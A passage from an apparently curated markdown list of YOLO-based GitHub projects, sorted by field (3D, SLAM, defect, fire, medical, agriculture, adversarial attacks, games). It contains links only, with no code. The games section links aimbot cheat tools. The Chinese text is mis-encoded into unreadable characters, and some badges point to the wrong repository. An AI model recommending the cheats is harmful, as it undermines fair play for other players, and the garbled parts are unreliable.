2023](https://arxiv.org/abs/2306.02245)**). - [maudzung/YOLO3D-YOLOv4-PyTorch](https://github.com/maudzung/YOLO3D-YOLOv4-PyTorch) <img src="https://img.shields.io/github/stars/maudzung/YOLO3D-YOLOv4-PyTorch?style=social"/> : The PyTorch Implementation based on YOLOv4 of the paper: "YOLO3D: End-to-end real-time 3D Oriented Object Bounding Box Detection from LiDAR Point Cloud". (**[ECCV 2018](https://openaccess.thecvf.com/content_eccv_2018_workshops/w18/html/Ali_YOLO3D_End-to-end_real-time_3D_Oriented_Object_Bounding_Box_Detection_from_ECCVW_2018_paper.html)**) - [maudzung/Complex-YOLOv4-Pytorch](https://github.com/maudzung/Complex-YOLOv4-Pytorch) <img src="https://img.shields.io/github/stars/maudzung/Complex-YOLOv4-Pytorch?style=social"/> : The PyTorch Implementation based on YOLOv4 of the paper: "Complex-YOLO: Real-time 3D Object Detection on Point Clouds". (**[arXiv 2018](https://arxiv.org/abs/1803.06199)**) - [AI-liu/Complex-YOLO](https://github.com/AI-liu/Complex-YOLO) <img src="https://img.shields.io/github/stars/AI-liu/Complex-YOLO?style=social"/> : This is an unofficial implementation of "Complex-YOLO: Real-time 3D Object Detection on Point Clouds in pytorch". (**[arXiv 2018](https://arxiv.org/abs/1803.06199)**) - [ghimiredhikura/Complex-YOLOv3](https://github.com/ghimiredhikura/Complex-YOLOv3) <img src="https://img.shields.io/github/stars/ghimiredhikura/Complex-YOLOv3?style=social"/> : Complete but Unofficial PyTorch Implementation of "Complex-YOLO: Real-time 3D Object Detection on Point Clouds with YoloV3". (**[arXiv 2018](https://arxiv.org/abs/1803.06199)**) - [ruhyadi/YOLO3D](https://github.com/ruhyadi/YOLO3D) <img src="https://img.shields.io/github/stars/ruhyadi/YOLO3D?style=social"/> : YOLO 3D Object Detection for Autonomous Driving Vehicle. Reference by [skhadem/3D-BoundingBox](https://github.com/skhadem/3D-BoundingBox), "3D Bounding Box Estimation Using Deep Learning and Geometry". (**[CVPR 2017](https://openaccess.thecvf.com/content_cvpr_2017/html/Mousavian_3D_Bounding_Box_CVPR_2017_paper.html)**) - [ruhyadi/yolo3d-lightning](https://github.com/ruhyadi/yolo3d-lightning) <img src="https://img.shields.io/github/stars/ruhyadi/YOLO3D?style=social"/> : YOLO for 3D Object Detection. - [Yuanchu/YOLO3D](https://github.com/Yuanchu/YOLO3D) <img src="https://img.shields.io/github/stars/Yuanchu/YOLO3D?style=social"/> : Implementation of a basic YOLO model for object detection in 3D. - [EmiyaNing/3D-YOLO](https://github.com/EmiyaNing/3D-YOLO) <img src="https://img.shields.io/github/stars/EmiyaNing/3D-YOLO?style=social"/> : YOLO v5 for Lidar-based 3D BEV Detection. - ### SLAM Field Detection #### SLAM้ข†ๅŸŸๆฃ€ๆต‹ - [bijustin/YOLO-DynaSLAM](https://github.com/bijustin/YOLO-DynaSLAM) <img src="https://img.shields.io/github/stars/bijustin/YOLO-DynaSLAM?style=social"/> : YOLO Dynamic ORB_SLAM is a visual SLAM system that is robust in dynamic scenarios for RGB-D configuration. - [BzdTaisa/YoloPlanarSLAM](https://github.com/BzdTaisa/YoloPlanarSLAM) <img src="https://img.shields.io/github/stars/BzdTaisa/YoloPlanarSLAM?style=social"/> : YOLO-Planar-SLAM. - [saransapmaz/cv-slam-object-determination](https://github.com/saransapmaz/cv-slam-object-determination) <img src="https://img.shields.io/github/stars/saransapmaz/cv-slam-object-determination?style=social"/> : Object detection with hector slam and YOLO v3 computer vision algorithm. - ### Industrial Defect Detection #### ๅทฅไธš็ผบ้™ทๆฃ€ๆต‹ - [annsonic/Steel_defect](https://github.com/annsonic/Steel_defect) <img src="https://img.shields.io/github/stars/annsonic/Steel_defect?style=social"/> : Exercise: Use YOLO to detect hot-rolled steel strip surface defects (NEU-DET dataset). - [VanillaHours/pcbDefectDetectionYOLO](https://github.com/VanillaHours/pcbDefectDetectionYOLO) <img src="https://img.shields.io/github/stars/VanillaHours/pcbDefectDetectionYOLO?style=social"/> : PCB defect detection using YOLOv3, on DeepPCB dataset. - [talisma-cassoma/pcb-components-detection-recognition](https://github.com/talisma-cassoma/pcb-components-detection-recognition) <img src="https://img.shields.io/github/stars/talisma-cassoma/pcb-components-detection-recognition?style=social"/> : this code shows the train and test of a YOLOV5 convolutional neural network for detection of electronics components. - [Luckycat518/Yolo-MSAPF](https://github.com/Luckycat518/Yolo-MSAPF) <img src="https://img.shields.io/github/stars/Luckycat518/Yolo-MSAPF?style=social"/> : Yolo-MSAPF: Multi-Scale Alignment fusion with Parallel feature Filtering model for high accuracy weld defect detection. - [JiaLim98/YOLO-PCB](https://github.com/JiaLim98/YOLO-PCB) <img src="https://img.shields.io/github/stars/JiaLim98/YOLO-PCB?style=social"/> : A Deep Context Learning based PCB Defect Detection Model with Anomalous Trend Alarming System. - ### SAR Image Detection #### ๅˆๆˆๅญ”ๅพ„้›ท่พพๅ›พๅƒๆฃ€ๆต‹ - [humblecoder612/SAR_yolov3](https://github.com/humblecoder612/SAR_yolov3) <img src="https://img.shields.io/github/stars/humblecoder612/SAR_yolov3?style=social"/> : Best Accruacy:speed ratio SAR Ship detection in the world. - #### Multispectral Image Fusion Detection #### ๅคšๅ…‰่ฐฑๅ›พๅƒ่žๅˆๆฃ€ๆต‹ - [NVIDIA-AI-IOT/Lidar_AI_Solution](https://github.com/NVIDIA-AI-IOT/Lidar_AI_Solution) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/Lidar_AI_Solution?style=social"/> : This is a highly optimized solution for self-driving 3D-lidar repository. It does a great job of speeding up sparse convolution/CenterPoint/BEVFusion/OSD/Conversion. A project demonstrating Lidar related AI solutions, including three GPU accelerated Lidar/camera DL networks (PointPillars, CenterPoint, BEVFusion) and the related libs (cuPCL, 3D SparseConvolution, YUV2RGB, cuOSD,). - [SuperYOLO](https://github.com/icey-zhang/SuperYOLO) <img src="https://img.shields.io/github/stars/icey-zhang/SuperYOLO?style=social"/> : "SuperYOLO: Super Resolution Assisted Object Detection in Multimodal Remote Sensing Imagery". (**[arXiv 2022](https://arxiv.org/abs/2209.13351)**) - [OrangeSodahub/CRLFnet](https://github.com/OrangeSodahub/CRLFnet) <img src="https://img.shields.io/github/stars/OrangeSodahub/CRLFnet?style=social"/> : Camera-Radar-Lidar Fusion detection net based on ROS, YOLOv3, OpenPCDet integration. - [mjoshi07/Visual-Sensor-Fusion](https://github.com/mjoshi07/Visual-Sensor-Fusion) <img src="https://img.shields.io/github/stars/mjoshi07/Visual-Sensor-Fusion?style=social"/> : LiDAR Fusion with Vision. - [DocF/multispectral-object-detection](https://github.com/DocF/multispectral-object-detection) <img src="https://img.shields.io/github/stars/DocF/multispectral-object-detection?style=social"/> : Multispectral Object Detection with Yolov5 and Transformer. - [MAli-Farooq/Thermal-YOLO](https://github.com/MAli-Farooq/Thermal-YOLO) <img src="https://img.shields.io/github/stars/sierprinsky/YoloV5_blood_cells?style=social"/> : This study is related to object detection in thermal infrared spectrum using YOLO-V5 framework for ADAS application. - [Ye-zixiao/Double-YOLO-Kaist](https://github.com/Ye-zixiao/Double-YOLO-Kaist) <img src="https://img.shields.io/github/stars/Ye-zixiao/Double-YOLO-Kaist?style=social"/> : ไธ€็งๅŸบไบŽYOLOv3/4็š„ๅŒๆตๆททๅˆๆจกๆ€้“่ทฏ่กŒไบบๆฃ€ๆต‹ๆ–นๆณ•๐ŸŒŠ๐Ÿ’ง๐Ÿ’ฆใ€‚ - [eralso/yolov5_Visible_Infrared_Vehicle_Detection](https://github.com/eralso/yolov5_Visible_Infrared_Vehicle_Detection) <img src="https://img.shields.io/github/stars/eralso/yolov5_Visible_Infrared_Vehicle_Detection?style=social"/> : ๅŸบไบŽๅฏ่งๅ…‰ๅ’Œ็บขๅค–ๅ›พๅƒ็š„ๆทฑๅบฆๅญฆไน ่ฝฆ่พ†็›ฎๆ ‡ๆฃ€ๆต‹ใ€‚ - [Arrowes/CEAM-YOLOv7](https://github.com/Arrowes/CEAM-YOLOv7) <img src="https://img.shields.io/github/stars/Arrowes/CEAM-YOLOv7?style=social"/> : CEAM-YOLOv7: Improved YOLOv7 Based on Channel Expansion and Attention Mechanism for Driver Distraction Behavior Detection. - [jere357/yolov5-RGBD](https://github.com/jere357/yolov5-RGBD) <img src="https://img.shields.io/github/stars/jere357/yolov5-RGBD?style=social"/> : "fork" from yolov5 with the possibility of running inferences on RGBD(C) images, work in progress. This repo is not a fork of the original repo bcs i already have 1 fork with a PR pending, this is still messy code and a work in progress. - ### Safety Monitoring Field Detection #### ๅฎ‰้˜ฒ็›‘ๆŽง้ข†ๅŸŸๆฃ€ๆต‹ - [gengyanlei/fire-smoke-detect-yolov4](https://github.com/gengyanlei/fire-smoke-detect-yolov4) <img src="https://img.shields.io/github/stars/gengyanlei/fire-smoke-detect-yolov4?style=social"/> : fire-smoke-detect-yolov4-yolov5 and fire-smoke-detection-dataset ็ซ็พๆฃ€ๆต‹๏ผŒ็ƒŸ้›พๆฃ€ๆต‹ใ€‚ - [CVUsers/Smoke-Detect-by-YoloV5](https://github.com/CVUsers/Smoke-Detect-by-YoloV5) <img src="https://img.shields.io/github/stars/CVUsers/Smoke-Detect-by-YoloV5?style=social"/> : Yolov5 real time smoke detection system. - [CVUsers/Fire-Detect-by-YoloV5](https://github.com/CVUsers/Fire-Detect-by-YoloV5) <img src="https://img.shields.io/github/stars/CVUsers/Fire-Detect-by-YoloV5?style=social"/> : ็ซ็พๆฃ€ๆต‹๏ผŒๆต“็ƒŸๆฃ€ๆต‹๏ผŒๅธ็ƒŸๆฃ€ๆต‹ใ€‚ - [spacewalk01/Yolov5-Fire-Detection](https://github.com/spacewalk01/Yolov5-Fire-Detection) <img src="https://img.shields.io/github/stars/spacewalk01/Yolov5-Fire-Detection?style=social"/> : Train yolov5 to detect fire in an image or video. - [roflcoopter/viseron](https://github.com/roflcoopter/viseron) <img src="https://img.shields.io/github/stars/roflcoopter/viseron?style=social"/> : Viseron - Self-hosted NVR with object detection. - [dcmartin/motion-ai](https://github.com/dcmartin/motion-ai) <img src="https://img.shields.io/github/stars/dcmartin/motion-ai?style=social"/> : AI assisted motion detection for Home Assistant. - [Nico31415/Drowning-Detector](https://github.com/Nico31415/Drowning-Detector) <img src="https://img.shields.io/github/stars/Nico31415/Drowning-Detector?style=social"/> : Using YOLO object detection, this program will detect if a person is drowning. - [mc-cat-tty/DoorbellCamDaemon](https://github.com/mc-cat-tty/DoorbellCamDaemon) <img src="https://img.shields.io/github/stars/mc-cat-tty/DoorbellCamDaemon?style=social"/> : Part of DoorbellCam project: daemon for people recognition with YOLO from a RTSP video stream. - [Choe-Ji-Hwan/Fire_Detect_Custom_Yolov5](https://github.com/Choe-Ji-Hwan/Fire_Detect_Custom_Yolov5) <img src="https://img.shields.io/github/stars/Choe-Ji-Hwan/Fire_Detect_Custom_Yolov5?style=social"/> : 2022-1 Individual Research Assignment: Using YOLOv5 to simply recognize each type of fire. - [bishal116/FireDetection](https://github.com/bishal116/FireDetection) <img src="https://img.shields.io/github/stars/bishal116/FireDetection?style=social"/> : This project builds fire detecton using YOLO v3 model. - [Psynosaur/Jetson-SecVision](https://github.com/Psynosaur/Jetson-SecVision) <img src="https://img.shields.io/github/stars/Psynosaur/Jetson-SecVision?style=social"/> : Person detection for Hikvision DVR with AlarmIO ports, uses TensorRT and yolov4. - [robmarkcole/fire-detection-from-images](https://github.com/robmarkcole/fire-detection-from-images) <img src="https://img.shields.io/github/stars/robmarkcole/fire-detection-from-images?style=social"/> : Detect fire in images using neural nets. - [gaiasd/DFireDataset](https://github.com/gaiasd/DFireDataset) <img src="https://img.shields.io/github/stars/gaiasd/DFireDataset?style=social"/> : D-Fire: an image data set for fire and smoke detection. - [MuhammadMoinFaisal/FireDetectionYOLOv8](https://github.com/MuhammadMoinFaisal/FireDetectionYOLOv8) <img src="https://img.shields.io/github/stars/MuhammadMoinFaisal/FireDetectionYOLOv8?style=social"/> : Fire Detection using YOLOv8. - [AI-Expert-04/School_Zone_Eye_Level](https://github.com/AI-Expert-04/School_Zone_Eye_Level) <img src="https://img.shields.io/github/stars/AI-Expert-04/School_Zone_Eye_Level?style=social"/> : Prevention of accidents in school zones using deep learning. - [roboflow/supervision](https://github.com/roboflow/supervision) <img src="https://img.shields.io/github/stars/roboflow/supervision?style=social"/> : We write your reusable computer vision tools. ๐Ÿ’œ [roboflow.github.io/supervision](https://roboflow.github.io/supervision/) - [AntroSafin/Fire_Detection_YoloV5](https://github.com/AntroSafin/Fire_Detection_YoloV5) <img src="https://img.shields.io/github/stars/AntroSafin/Fire_Detection_YoloV5?style=social"/> : This is the YoloV5 fire detection application. - [harivams-sai/FireDetectionYOLOv8](https://github.com/harivams-sai/FireDetectionYOLOv8) <img src="https://img.shields.io/github/stars/harivams-sai/FireDetectionYOLOv8?style=social"/> : A fire detection model based on YOLOv8 Ultralytics model for object detection. Tech: Python, Computer Vision, Colab Notebook, Fire-detection, YOLOv8. - [e-candeloro/SAURUSS-Autonomous-Drone-Surveillance](https://github.com/e-candeloro/SAURUSS-Autonomous-Drone-Surveillance) <img src="https://img.shields.io/github/stars/e-candeloro/SAURUSS-Autonomous-Drone-Surveillance?style=social"/> : An autonomous drone and sensor based surveillance system that use a Tello Drone, an Arduino, a Raspberry Pi and an Android smartphone. - [pedbrgs/Fire-Detection](https://github.com/pedbrgs/Fire-Detection) <img src="https://img.shields.io/github/stars/pedbrgs/Fire-Detection?style=social"/> : Fire and smoke detection using spatial and temporal patterns. - ### Medical Field Detection #### ๅŒปๅญฆ้ข†ๅŸŸๆฃ€ๆต‹ - [DataXujing/YOLO-v5](https://github.com/DataXujing/YOLO-v5) <img src="https://img.shields.io/github/stars/DataXujing/YOLO-v5?style=social"/> : YOLO v5ๅœจๅŒป็–—้ข†ๅŸŸไธญๆถˆๅŒ–ๅ†…้•œ็›ฎๆ ‡ๆฃ€ๆต‹็š„ๅบ”็”จใ€‚ - [Jafar-Abdollahi/Automated-detection-of-COVID-19-cases-using-deep-neural-networks-with-CTS-images](https://github.com/Jafar-Abdollahi/Automated-detection-of-COVID-19-cases-using-deep-neural-networks-with-CTS-images) <img src="https://img.shields.io/github/stars/Jafar-Abdollahi/Automated-detection-of-COVID-19-cases-using-deep-neural-networks-with-CTS-images?style=social"/> : In this project, a new model for automatic detection of covid-19 using raw chest X-ray images is presented. - [fahriwps/breast-cancer-detection](https://github.com/fahriwps/breast-cancer-detection) <img src="https://img.shields.io/github/stars/fahriwps/breast-cancer-detection?style=social"/> : Breast cancer mass detection using YOLO object detection algorithm and GUI. - [niehusst/YOLO-Cancer-Detection](https://github.com/niehusst/YOLO-Cancer-Detection) <img src="https://img.shields.io/github/stars/niehusst/YOLO-Cancer-Detection?style=social"/> : An implementation of the YOLO algorithm trained to spot tumors in DICOM images. - [safakgunes/Blood-Cancer-Detection-YOLOV5](https://github.com/safakgunes/Blood-Cancer-Detection-YOLOV5) <img src="https://img.shields.io/github/stars/safakgunes/Blood-Cancer-Detection-YOLOV5?style=social"/> : Blood Cancer Detection with YOLOV5. - [shchiang0708/YOLOv2_skinCancer](https://github.com/shchiang0708/YOLOv2_skinCancer) <img src="https://img.shields.io/github/stars/shchiang0708/YOLOv2_skinCancer?style=social"/> : YOLOv2_skinCancer. - [avral1810/parkinsongait](https://github.com/avral1810/parkinsongait) <img src="https://img.shields.io/github/stars/avral1810/parkinsongait?style=social"/> : Parkinsonโ€™s Disease. - [sierprinsky/YoloV5_blood_cells](https://github.com/sierprinsky/YoloV5_blood_cells) <img src="https://img.shields.io/github/stars/sierprinsky/YoloV5_blood_cells?style=social"/> : The main idea of this project is to detect blood cells using YOLOV5 over a public roboflow dataset. - [LuozyCS/skin_disease_detection_yolov5](https://github.com/LuozyCS/skin_disease_detection_yolov5) <img src="https://img.shields.io/github/stars/LuozyCS/skin_disease_detection_yolov5?style=social"/> : skin_disease_detection_yolov5. - [Moqixis/object_detection_yolov5_deepsort](https://github.com/Moqixis/object_detection_yolov5_deepsort) <img src="https://img.shields.io/github/stars/Moqixis/object_detection_yolov5_deepsort?style=social"/> : ๅŸบไบŽyolov5+deepsort็š„ๆฏ่‚‰็›ฎๆ ‡ๆฃ€ๆต‹ใ€‚ - [mdciri/YOLOv7-Bone-Fracture-Detection](https://github.com/mdciri/YOLOv7-Bone-Fracture-Detection) <img src="https://img.shields.io/github/stars/mdciri/YOLOv7-Bone-Fracture-Detection?style=social"/> : YOLOv7 to detect bone fractures on X-ray images. - [MIRACLE-Center/YOLO_Universal_Anatomical_Landmark_Detection](https://github.com/MIRACLE-Center/YOLO_Universal_Anatomical_Landmark_Detection) <img src="https://img.shields.io/github/stars/MIRACLE-Center/YOLO_Universal_Anatomical_Landmark_Detection?style=social"/> : [MICCAI 2021] [You Only Learn Once: Universal Anatomical Landmark Detection](https://arxiv.org/abs/2103.04657) - [fahriwps/breast-cancer-detection](https://github.com/fahriwps/breast-cancer-detection) <img src="https://img.shields.io/github/stars/fahriwps/breast-cancer-detection?style=social"/> : Breast cancer mass detection using YOLO object detection algorithm and GUI. - [mkang315/CST-YOLO](https://github.com/mkang315/CST-YOLO) <img src="https://img.shields.io/github/stars/mkang315/CST-YOLO?style=social"/> : Official implementation of "CST-YOLO: A Novel Method for Blood Cell Detection Based on Improved YOLOv7 and CNN-Swin Transformer". - ### Chemistry Field Detection #### ๅŒ–ๅญฆ้ข†ๅŸŸๆฃ€ๆต‹ - [xuguodong1999/COCR](https://github.com/xuguodong1999/COCR) <img src="https://img.shields.io/github/stars/xuguodong1999/COCR?style=social"/> : COCR is designed to convert an image of hand-writing chemical structure to graph of that molecule. - ### Agricultural Field Detection #### ๅ†œไธš้ข†ๅŸŸๆฃ€ๆต‹ - [liao1fan/MGA-YOLO-for-apple-leaf-disease-detection](https://github.com/liao1fan/MGA-YOLO-for-apple-leaf-disease-detection) <img src="https://img.shields.io/github/stars/liao1fan/MGA-YOLO-for-apple-leaf-disease-detection?style=social"/> : MGA-YOLO: A Lightweight One-Stage Network for Apple Leaf Disease Detection. - [tanmaypandey7/wheat-detection](https://github.com/tanmaypandey7/wheat-detection) <img src="https://img.shields.io/github/stars/tanmaypandey7/wheat-detection?style=social"/> : Detecting wheat heads using YOLOv5. - [WoodratTradeCo/crop-rows-detection](https://github.com/WoodratTradeCo/crop-rows-detection) <img src="https://img.shields.io/github/stars/WoodratTradeCo/crop-rows-detection?style=social"/> : It is an real-time crop rows detection method using YOLOv5. - [denghv/Vegetables_Fruit_Detection](https://github.com/denghv/Vegetables_Fruit_Detection) <img src="https://img.shields.io/github/stars/denghv/Vegetables_Fruit_Detection?style=social"/> : Using YOLOv10 to detect vegetables & fruit. - ### Sports Field Detection #### ไฝ“่‚ฒ้ข†ๅŸŸๆฃ€ๆต‹ - [tomer-erez/pingpong-referee](https://github.com/tomer-erez/pingpong-referee) <img src="https://img.shields.io/github/stars/tomer-erez/pingpong-referee?style=social"/> : using the YOlO algorithm for an automated pingpong referee. - ### Adverse Weather Conditions #### ๆถๅŠฃๅคฉๆฐ”ๆƒ…ๅ†ต - [LLVIP](https://github.com/bupt-ai-cz/LLVIP) <img src="https://img.shields.io/github/stars/bupt-ai-cz/LLVIP?style=social"/> : "LLVIP: A Visible-infrared Paired Dataset for Low-light Vision". (**[ICCV 2021](https://openaccess.thecvf.com/content/ICCV2021W/RLQ/html/Jia_LLVIP_A_Visible-Infrared_Paired_Dataset_for_Low-Light_Vision_ICCVW_2021_paper.html)**) - [Image-Adaptive YOLO](https://github.com/wenyyu/Image-Adaptive-YOLO) <img src="https://img.shields.io/github/stars/wenyyu/Image-Adaptive-YOLO?style=social"/> : "Image-Adaptive YOLO for Object Detection in Adverse Weather Conditions". (**[AAAI 2022](https://arxiv.org/abs/2112.08088)**). "่ฎก็ฎ—ๆœบ่ง†่ง‰็ ”็ฉถ้™ข๏ผšใ€Š[ๅ›พๅƒ่‡ช้€‚ๅบ”YOLO๏ผšๆจก็ณŠ็Žฏๅขƒไธ‹็š„็›ฎๆ ‡ๆฃ€ๆต‹๏ผˆ้™„ๆบไปฃ็ ๏ผ‰](https://mp.weixin.qq.com/s/QdM6Dx990VhN97MRIP74XA)ใ€‹" - ### Adversarial Attack and Defense #### ๅฏนๆŠ—ๆ”ปๅ‡ปไธŽ้˜ฒๅพก - [EAVISE/adversarial-yolo](https://gitlab.com/EAVISE/adversarial-yolo) : "Fooling automated surveillance cameras: adversarial patches to attack person detection". (**[CVPR 2019](https://openaccess.thecvf.com/content_CVPRW_2019/html/CV-COPS/Thys_Fooling_Automated_Surveillance_Cameras_Adversarial_Patches_to_Attack_Person_Detection_CVPRW_2019_paper.html)**) - [git-disl/TOG](https://github.com/git-disl/TOG) <img src="https://img.shields.io/github/stars/git-disl/TOG?style=social"/> : "Adversarial Objectness Gradient Attacks on Real-time Object Detection Systems". (**[IEEE TPS-ISA 2020](https://ieeexplore.ieee.org/abstract/document/9325397)**) | "Understanding Object Detection Through an Adversarial Lens". (**[ESORICS 2020](https://link.springer.com/chapter/10.1007/978-3-030-59013-0_23)**) - [VITA-Group/3D_Adversarial_Logo](https://github.com/VITA-Group/3D_Adversarial_Logo) <img src="https://img.shields.io/github/stars/VITA-Group/3D_Adversarial_Logo?style=social"/> : 3D adversarial logo attack on different3D object meshes to fool a YOLOV2 detector. "Can 3D Adversarial Logos Clock Humans?". (**[arXiv 2020](https://arxiv.org/abs/2006.14655)**) - [ASGuard-UCI/MSF-ADV](https://github.com/ASGuard-UCI/MSF-ADV) <img src="https://img.shields.io/github/stars/ASGuard-UCI/MSF-ADV?style=social"/> : MSF-ADV is a novel physical-world adversarial attack method, which can fool the Multi Sensor Fusion (MSF) based autonomous driving (AD) perception in the victim autonomous vehicle (AV) to fail in detecting a front obstacle and thus crash into it. "Invisible for both Camera and LiDAR: Security of Multi-Sensor Fusion based Perception in Autonomous Driving Under Physical-World Attacks". (**[IEEE S&P 2021](https://www.computer.org/csdl/proceedings-article/sp/2021/893400b302/1t0x9btzenu)**) - [veralauee/DPatch](https://github.com/veralauee/DPatch) <img src="https://img.shields.io/github/stars/veralauee/DPatch?style=social"/> : "DPatch: An Adversarial Patch Attack on Object Detectors". (**[arXiv 2018](https://arxiv.org/abs/1806.02299)**) - [Shudeng/GPAttack](https://github.com/Shudeng/GPAttack) <img src="https://img.shields.io/github/stars/Shudeng/GPAttack?style=social"/> : Grid Patch Attack for Object Detection. - [Wu-Shudeng/DPAttack](https://github.com/Wu-Shudeng/DPAttack) <img src="https://img.shields.io/github/stars/Wu-Shudeng/DPAttack?style=social"/> : "DPAttack: Diffused Patch Attacks against Universal Object Detection". (**[arXiv 2020](https://arxiv.org/abs/2010.11679)**) - [FenHua/DetDak](https://github.com/FenHua/DetDak) <img src="https://img.shields.io/github/stars/FenHua/DetDak?style=social"/> : Patch adversarial attack; object detection; CIKM2020 ๅฎ‰ๅ…จAIๆŒ‘ๆˆ˜่€…่ฎกๅˆ’็ฌฌๅ››ๆœŸ๏ผš้€š็”จ็›ฎๆ ‡ๆฃ€ๆต‹็š„ๅฏนๆŠ—ๆ”ปๅ‡ปใ€‚ "Object Hider: Adversarial Patch Attack Against Object Detectors". (**[arXiv 2020](https://arxiv.org/abs/2010.14974)**) - [THUrssq/Tianchi04](https://github.com/THUrssq/Tianchi04) <img src="https://img.shields.io/github/stars/THUrssq/Tianchi04?style=social"/> : This is NO.4 solution for "CIKM-2020 Alibaba-Tsinghua Adversarial Challenge on Object Detection". "Sparse Adversarial Attack to Object Detection". (**[arXiv 2020](https://arxiv.org/abs/2012.13692)**) - [mesunhlf/UPC-tf](https://github.com/mesunhlf/UPC-tf) <img src="https://img.shields.io/github/stars/mesunhlf/UPC-tf?style=social"/> : "Universal Physical Camouflage Attacks on Object Detectors". (**[CVPR 2020](https://openaccess.thecvf.com/content_CVPR_2020/html/Huang_Universal_Physical_Camouflage_Attacks_on_Object_Detectors_CVPR_2020_paper.html)**) - [alex96295/YOLOv3_adversarial_defense](https://github.com/alex96295/YOLOv3_adversarial_defense) <img src="https://img.shields.io/github/stars/alex96295/YOLOv3_adversarial_defense?style=social"/> : YOLOv3_adversarial_defense. - [alex96295/YOLO_adversarial_attacks](https://github.com/alex96295/YOLO_adversarial_attacks) <img src="https://img.shields.io/github/stars/alex96295/YOLO_adversarial_attacks?style=social"/> : YOLO_adversarial_attacks. - [alex96295/Adversarial-Patch-Attacks-TRAINING-YOLO-SSD-Pytorch](https://github.com/alex96295/Adversarial-Patch-Attacks-TRAINING-YOLO-SSD-Pytorch) <img src="https://img.shields.io/github/stars/alex96295/Adversarial-Patch-Attacks-TRAINING-YOLO-SSD-Pytorch?style=social"/> : This repository has the code needed to train 'Adversarial Patch Attacks' on YOLO and SSD models for object detection in Pytorch. - [FranBesq/attack-yolo](https://github.com/FranBesq/attack-yolo) <img src="https://img.shields.io/github/stars/FranBesq/attack-yolo?style=social"/> : Developing adversarial attacks on YOLO algorithm for computer vision. - [Rushi314/GPR-Object-Detection](https://github.com/Rushi314/GPR-Object-Detection) <img src="https://img.shields.io/github/stars/Rushi314/GPR-Object-Detection?style=social"/> : Detecting Objects in Ground Penetrating Radars Scans. - [realtxy/pso-adversarial-yolo_v3](https://github.com/realtxy/pso-adversarial-yolo_v3) <img src="https://img.shields.io/github/stars/realtxy/pso-adversarial-yolo_v3?style=social"/> : pso-adversarial-yolo_v3. - [sowgali/ObjCAM](https://github.com/sowgali/ObjCAM) <img src="https://img.shields.io/github/stars/sowgali/ObjCAM?style=social"/> : Visualizations for adversarial attacks in object detectors like YOLO. - [andrewpatrickdu/adversarial-yolov3-cowc](https://github.com/andrewpatrickdu/adversarial-yolov3-cowc) <img src="https://img.shields.io/github/stars/andrewpatrickdu/adversarial-yolov3-cowc?style=social"/> : "Physical Adversarial Attacks on an Aerial Imagery Object Detector". (**[WACV 2022](https://openaccess.thecvf.com/content/WACV2022/html/Du_Physical_Adversarial_Attacks_on_an_Aerial_Imagery_Object_Detector_WACV_2022_paper.html)**) - [IQTLabs/camolo](https://github.com/IQTLabs/camolo) <img src="https://img.shields.io/github/stars/IQTLabs/camolo?style=social"/> : Camouflage YOLO - (CAMOLO) trains adversarial patches to confuse the YOLO family of object detectors. - [AdvTexture](https://github.com/WhoTHU/Adversarial_Texture) <img src="https://img.shields.io/github/stars/WhoTHU/Adversarial_Texture?style=social"/> : "Adversarial Texture for Fooling Person Detectors in the Physical World". (**[CVPR 2022](https://openaccess.thecvf.com/content/CVPR2022/html/Hu_Adversarial_Texture_for_Fooling_Person_Detectors_in_the_Physical_World_CVPR_2022_paper.html)**). "็ŸฅไนŽใ€ŒWhoTHใ€ใ€Š[CVPR2022 Oral ็‰ฉ็†ๅฏนๆŠ—ๆ ทๆœฌ ๅฆ‚ไฝ•ๅšไธ€ไปถโ€œ้šๅฝข่กฃโ€](https://zhuanlan.zhihu.com/p/499854846)ใ€‹"ใ€‚ - [SamSamhuns/yolov5_adversarial](https://github.com/SamSamhuns/yolov5_adversarial) <img src="https://img.shields.io/github/stars/SamSamhuns/yolov5_adversarial?style=social"/> : Generate adversarial patches against YOLOv5 ๐Ÿš€ - ### Game Field Detection #### ๆธธๆˆ้ข†ๅŸŸๆฃ€ๆต‹ - [petercunha/Pine](https://github.com/petercunha/Pine) <img src="https://img.shields.io/github/stars/petercunha/Pine?style=social"/> : ๐ŸŒฒ Aimbot powered by real-time object detection with neural networks, GPU accelerated with Nvidia. Optimized for use with CS:GO. - [chaoyu1999/FPSAutomaticAiming](https://github.com/chaoyu1999/FPSAutomaticAiming) <img src="https://img.shields.io/github/stars/chaoyu1999/FPSAutomaticAiming?style=social"/> : ๅŸบไบŽyolov5็š„FPS็ฑปๆธธๆˆAI่‡ช็ž„AIใ€‚ - [Lu-tju/CSGO_AI](https://github.com/Lu-tju/CSGO_AI) <img src="https://img.shields.io/github/stars/Lu-tju/CSGO_AI?style=social"/> : ๅŸบไบŽYOLOv3็š„csgo่‡ช็ž„ใ€‚ - [kir486680/csgo_aim](https://github.com/kir486680/csgo_aim) <img src="https://img.shields.io/github/stars/kir486680/csgo_aim?style=social"/> : Aim assist for CSGO with python and yolo. - [c925777075/yolov5-dnf](https://github.com/c925777075/yolov5-dnf) <img src="https://img.shields.io/github/stars/c925777075/yolov5-dnf?style=social"/> : yolov5-DNF. - [davidhoung2/APEX-yolov5-aim-assist](https://github.com/davidhoung2/APEX-yolov5-aim-assist) <img src="https://img.shields.io/github/stars/davidhoung2/APEX-yolov5-aim-assist?style=social"/> : using yolov5 to help you aim enemies. - [Brednan/CSGO-Aimbot](https://github.com/Brednan/CSGO-Aimbot) <img src="https://img.shields.io/github/stars/Brednan/CSGO-Aimbot?style=social"/> : Aimbot for the FPS game CSGO. It uses YOLOv5 to detect enemy players on my screen, then moves my cursor to the location. - [2319590263/yolov5-csgo](https://github.com/2319590263/yolov5-csgo) <img src="https://img.shields.io/github/stars/2319590263/yolov5-csgo?style=social"/> : ๅŸบไบŽyolov5ๅฎž็Žฐ็š„csgo่‡ช็ž„ใ€‚ - [SCRN-VRC/YOLOv4-Tiny-in-UnityCG-HLSL](https://github.com/SCRN-VRC/YOLOv4-Tiny-in-UnityCG-HLSL) <img src="https://img.shields.io/github/stars/SCRN-VRC/YOLOv4-Tiny-in-UnityCG-HLSL?style=social"/> : A modern object detector inside fragment shaders. - [qcjxs-hn/yolov5-csgo](https://github.com/qcjxs-hn/yolov5-csgo) <img src="https://img.shields.io/github/stars/qcjxs-hn/yolov5-csgo?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชๆ 